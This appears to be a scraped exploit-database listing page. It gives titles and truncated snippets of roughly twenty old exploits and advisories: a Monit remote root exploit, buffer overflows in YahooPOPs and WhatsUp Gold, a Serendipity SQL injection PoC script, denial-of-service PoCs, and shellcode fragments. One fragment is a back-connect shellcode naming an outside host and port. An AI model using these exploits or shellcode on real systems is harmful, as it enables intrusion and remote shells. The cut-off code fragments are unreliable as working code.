Monit 4.2 - Basic Authentication Remote Code Execution

Monit 4.2 - Basic Authentication Remote Code Execution / THE EYE ON SECURITY RESEARCH GROUP - INDIA http://www.eos-india.net/poc/305monit.c Remote Root Exploit for Monit linuxmailorg - Abhisek Datta abhisekfrontru 06.04.2004 http://www.eos-india.net New Targets : RedHat 9 Fedora Core 2 Slackware...

ProFTPd 1.2.10 - Remote Users Enumeration

/ Details Vulnerable Systems: ProFTPD Version 1.2.10 and below It is possible to determine which user names are valid, which are special, and which ones do not exist on the remote system. This can be accomplished by code execution path timing analysis attack at the ProFTPd login procedure. There ...

YahooPOPs <= 1.6 SMTP Port Buffer Overflow Exploit

Exploit for unknown platform in category remote exploits ================================================== YahooPOPs = 1.6 SMTP Port Buffer Overflow Exploit ================================================== / YahooPOPS v1.6 and prior SMTP port buffer overflow exploit v0.1 Exploit code by class1...

YahooPOPs 1.6 - SMTP Port Buffer Overflow

/ YahooPOPS v1.6 and prior SMTP port buffer overflow exploit v0.1 Exploit code by class101 at DFind.kd-team.com Bind a shellcode to the port 101. Thanx to Behrang [email protected] for the bug discovery Thanx to HDMoore and Metasploit.com for their kickass ASM work Instead of to move...

Microsoft Internet Explorer Install Engine contains a buffer overflow vulnerability

Overview The Active Setup Install Engine in Microsoft Internet Explorer contains a buffer overflow vulnerability. This may allow an attacker to take complete control of a vulnerable system. Description The Active Setup Install Engine inseng.dll permits cabinet files to be launched and executed...

Monolith Games Local Buffer Overflow Exploit

Exploit for unknown platform in category dos / poc ============================================ Monolith Games Local Buffer Overflow Exploit ============================================ / by Luigi Auriemma / include include include include ifdef WIN32 include include "winerr.h" define close...

IPSwitch WhatsUp Gold 8.03 Remote Buffer Overflow Exploit

Exploit for unknown platform in category remote exploits ========================================================= IPSwitch WhatsUp Gold 8.03 Remote Buffer Overflow Exploit ========================================================= !/usr/bin/perl LoWNOISE NotmuchG.pl v.1.5...

IPSwitch WhatsUp Gold 8.03 Remote Buffer Overflow Exploit

No description provided by source. !/usr/bin/perl LoWNOISE NotmuchG.pl v.1.5 ================================================ IPSWITCH WhatsUp Gold ver8.03 Remote Buffer Overflow Exploit ================================================ Exploit by ET LoWNOISE Colombia etatcyberspace.org Oct/2004...

Debian DSA-184-1 : krb4 - buffer overflow

Tom Yu and Sam Hartman of MIT discovered another stack-based buffer overflow in the kadmserwrapin function in the Kerberos v4 administration server. This kadmind bug has a working exploit code circulating, hence it is considered serious. %NASLMINLEVEL 70300 C Tenable Network Security, Inc. The...

Serendipity 0.7-beta1 SQL Injection Proof of Concept

No description provided by source. Proof of Concept 1 ------------------ Usage: ./sersqlipoc.sh URLtoSerendipityWeblog sersqlipoc.sh ---------8-----------8------------- !/bin/sh echo -n "Username: " curl -I -s...

Microsoft SQL Server 7.0 - Remote Denial of Service (2)

// source: https://www.securityfocus.com/bid/11265/info Reportedly Microsoft SQL Server is affected by a remote denial of service vulnerability. This issue is due to a failure of the application to handle irregular network communications. An attacker may leverage this issue to cause the affected...

MyServer 0.7.1 (POST) Denial Of Service Exploit

Exploit for linux platform in category dos / poc =============================================== MyServer 0.7.1 POST Denial Of Service Exploit =============================================== // PoC to crash the server // / MyServer 0.7.1 POST Denial Of Service vendor URL:...

MyServer 0.7.1 - &#039;POST&#039; Denial of Service

// PoC to crash the server // / MyServer 0.7.1 POST Denial Of Service vendor URL: http://www.myserverproject.net coded and discovered by: badpack3t for .:sp research labs:. www.security-protocols.com 9.20.2004 Tested on Mandrake 10.0 usage: sp-myserv-0.7.1 targetport default is 80 / include inclu...

bsd/x86 connect 93 bytes

No description provided by source. / the back-connect shellcode. The destination addr is 0x28402ec3 rootteam.host.sk port is 0x8ae 2222. size = 93 bytes little isn't it? Greetz 2 sp00fed written by dev0id rus-sec /EFnet rootteam.host.sk BITS 32 jmp short path main: pop esi xor eax,eax mov byte...

linux/x86 eject /dev/cdrom 64 bytes

Exploit for linux/x86 platform in category shellcode =================================== linux/x86 eject /dev/cdrom 64 bytes =================================== / CDROM EJECTING CODE by lamagra .data .globl main .type main,@function start: setreuid 0, 0 xorl %eax,%eax xorl %ebx,%ebx xorl %ecx,%ec...

freebsd/x86 execve /bin/sh 37 bytes

Exploit for freebsd/x86 platform in category shellcode =================================== freebsd/x86 execve /bin/sh 37 bytes =================================== / This is FreeBSD execve code.It is 37 bytes long.I'll try to make it smaller.Till then use this one. signed predator...

os-x/PPC create /tmp/suid 122 bytes

Exploit for os-x/ppc platform in category shellcode =================================== os-x/PPC create /tmp/suid 122 bytes =================================== / PPC OSX/Darwin Shellcode by B-r00t. 2003. Does open; write; close; exit; See ASM below. 122 Bytes. / char shellcode =...

linux/x86 ipchains -F 49 bytes

No description provided by source. include stdio.h include string.h / asm" sub $0x4,%esp Con esto conseguimos que la shellcode nunca se popl %esp sobreescriba... gracias RaiSe : xorl %edx,%edx %edx a cero pushl %edx y ponemos los zeros del final del string en memoria pushw $0x462d tenemos -F0000...

bsd/x86 execve /bin/sh Crypt /bin/sh 49 bytes

No description provided by source. / Self decripting dec/inc shellcode executes /bin/sh Size 49 bytes OS BSD /rootteam/dev0id www.sysworld.net [email protected] BITS 32 jmp short shellcode main: pop esi xor ecx,ecx mov cl,28 maindecript: inc byte esi+ecx loop maindecript inc byte esi push esi...

HPUX execve /bin/sh 58 bytes

No description provided by source. / Hp-Ux execve of /bin/sh by K2 / uchar shellcode = "\xe8\x3f\x1f\xfd\x08\x21\x02\x80\x34\x02\x01\x02\x08\x41\x04\x02\x60\x40" "\x01\x62\xb4\x5a\x01\x54\x0b\x39\x02\x99\x0b\x18\x02\x98\x34\x16\x04\xbe"...